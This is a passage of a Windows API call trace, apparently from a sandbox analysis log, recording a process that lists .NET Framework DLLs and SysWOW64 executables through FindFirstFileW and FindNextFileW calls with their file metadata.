ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91bd336f, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x3b0e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.EnterpriseServices.dll", cAlternateFileName="")) returned 1 [0101.744] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93a6de9f, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93a6de9f, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93a6f20a, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x18900, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.EnterpriseServices.Thunk.dll", cAlternateFileName="")) returned 1 [0101.744] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93ed49e0, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93ed49e0, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93ed5e78, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x8600, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.EnterpriseServices.tlb", cAlternateFileName="")) returned 1 [0101.744] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91bd4a6c, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91bd4a6c, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91bd5b48, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1b600, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.EnterpriseServices.Wrapper.dll", cAlternateFileName="")) returned 1 [0101.744] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x923037a2, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x923037a2, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x923037a2, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x72d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Globalization.dll", cAlternateFileName="")) returned 1 [0101.744] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x939788da, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x939788da, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93985f7e, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1070d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.IdentityModel.dll", cAlternateFileName="")) returned 1 [0101.744] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93968ac0, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93968ac0, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x9396b2f3, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x23510, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.IdentityModel.Selectors.dll", cAlternateFileName="")) returned 1 [0101.744] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e29301b, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e29301b, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e29438b, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x304f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.IdentityModel.Services.dll", cAlternateFileName="")) returned 1 [0101.744] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9239e863, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x9239e863, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x9239fbd5, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x118d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.IO.Compression.dll", cAlternateFileName="")) returned 1 [0101.744] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x939949c3, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x939949c3, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93995d64, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x8108, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.IO.Compression.FileSystem.dll", cAlternateFileName="")) returned 1 [0101.744] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x919fe774, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x919fe774, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x919ffb29, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7098, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.IO.dll", cAlternateFileName="")) returned 1 [0101.744] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x923a49e0, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x923a49e0, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x923a5d4b, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x20ab8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.IO.Log.dll", cAlternateFileName="")) returned 1 [0101.744] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91be1e1b, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91be1e1b, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91be31e0, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x72a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Linq.dll", cAlternateFileName="")) returned 1 [0101.745] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93c094a1, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93c094a1, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93c0a82a, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7ae8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Linq.Expressions.dll", cAlternateFileName="")) returned 1 [0101.745] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9396c597, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x9396c597, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x9396d935, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x72d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Linq.Parallel.dll", cAlternateFileName="")) returned 1 [0101.745] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93971377, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93971377, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93971377, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x72d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Linq.Queryable.dll", cAlternateFileName="")) returned 1 [0101.745] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91bfcbd9, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91bfcbd9, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91c019b0, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x64cc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Management.dll", cAlternateFileName="")) returned 1 [0101.745] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91a31c1e, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91a31c1e, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91a32fab, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x23908, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Management.Instrumentation.dll", cAlternateFileName="")) returned 1 [0101.745] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9206b6b1, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x9206b6b1, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x9206f154, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x430c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Messaging.dll", cAlternateFileName="")) returned 1 [0101.745] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8df5d741, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8df5d741, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8df5fe6a, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x3ea98, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Net.dll", cAlternateFileName="")) returned 1 [0101.745] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e25fb79, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e25fb79, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e262281, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x310b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Net.Http.dll", cAlternateFileName="")) returned 1 [0101.745] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8df611ec, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8df611ec, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8df611ec, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x72d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Net.Http.Rtc.dll", cAlternateFileName="")) returned 1 [0101.745] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dd93be5, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dd93be5, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dd94e9a, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xc6f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Net.Http.WebRequest.dll", cAlternateFileName="")) returned 1 [0101.745] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e08d697, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e08d697, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e08ea18, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7710, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Net.NetworkInformation.dll", cAlternateFileName="")) returned 1 [0101.747] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93b424f1, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93b424f1, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93b424f1, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x74d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Net.Primitives.dll", cAlternateFileName="")) returned 1 [0101.747] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dd88b6c, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dd88b6c, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dd88b6c, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x72d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Net.Requests.dll", cAlternateFileName="")) returned 1 [0101.747] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93ea0193, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93ea0193, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93ea0193, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7118, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Net.WebHeaderCollection.dll", cAlternateFileName="")) returned 1 [0101.747] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92040aba, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x92040aba, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x9205f3a8, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x21cb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Numerics.dll", cAlternateFileName="")) returned 1 [0101.747] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93dc330f, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93dc330f, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93dc330f, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7ae8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Numerics.Vectors.dll", cAlternateFileName="")) returned 1 [0101.747] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91bd6e5b, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91bd6e5b, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91bd81e4, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x74c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.ObjectModel.dll", cAlternateFileName="")) returned 1 [0101.747] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91e09b57, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91e09b57, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91e0ae11, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1a6f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Reflection.context.dll", cAlternateFileName="")) returned 1 [0101.747] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93c0a82a, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93c0a82a, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93c0bb94, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x74c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Reflection.dll", cAlternateFileName="")) returned 1 [0101.748] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e30aa03, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e30aa03, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e30bda8, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x72e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Reflection.Emit.dll", cAlternateFileName="")) returned 1 [0101.748] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x922b903a, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x922b903a, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x922ba3be, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7330, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Reflection.Emit.ILGeneration.dll", cAlternateFileName="")) returned 1 [0101.748] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x920d59d0, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x920d59d0, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x920d59d0, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7330, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Reflection.Emit.Lightweight.dll", cAlternateFileName="")) returned 1 [0101.748] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93a607df, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93a607df, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93a607df, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7300, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Reflection.Extensions.dll", cAlternateFileName="")) returned 1 [0101.748] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9217e130, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x9217e130, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x9217f4c3, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7308, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Reflection.Primitives.dll", cAlternateFileName="")) returned 1 [0101.748] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x922cefaa, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x922cefaa, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x922d0360, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7318, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Resources.ResourceManager.dll", cAlternateFileName="")) returned 1 [0102.064] FindFirstFileW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WPF\\*.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\wpf\\*.exe"), lpFindFileData=0x19e7fc | out: lpFindFileData=0x19e7fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0102.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ea98) returned 1 [0102.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19eaa4) returned 1 [0107.813] CoTaskMemAlloc (cb=0x108) returned 0x6ad170 [0107.813] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x6ad170, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\SysWOW64") returned 1 [0107.885] CoTaskMemFree (pv=0x6ad170) [0107.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19eadc) returned 1 [0107.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64", nBufferLength=0x105, lpBuffer=0x19e59c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64", lpFilePart=0x0) returned 0x13 [0107.887] FindFirstFileW (in: lpFileName="C:\\Windows\\SysWOW64\\*.exe" (normalized: "c:\\windows\\syswow64\\*.exe"), lpFindFileData=0x19e804 | out: lpFindFileData=0x19e804*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e66a3d4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e66a3d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e66a3d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARP.EXE", cAlternateFileName="")) returned 0x678698 [0107.891] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b99009d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2b99009d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2b99009d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6200, dwReserved0=0x0, dwReserved1=0x0, cFileName="at.exe", cAlternateFileName="")) returned 1 [0107.892] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bae75c4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2bae75c4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2bae75c4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AtBroker.exe", cAlternateFileName="")) returned 1 [0107.892] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28f182fa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28f182fa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28f182fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="attrib.exe", cAlternateFileName="")) returned 1 [0107.892] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ba027a9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ba027a9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ba027a9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xce00, dwReserved0=0x0, dwReserved1=0x0, cFileName="auditpol.exe", cAlternateFileName="")) returned 1 [0107.892] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29c81670, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29c81670, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29c81670, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd0400, dwReserved0=0x0, dwReserved1=0x0, cFileName="autochk.exe", cAlternateFileName="")) returned 1 [0107.893] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29c351c3, ftCreationTime.dwHighDateTime=0x1d112e3, 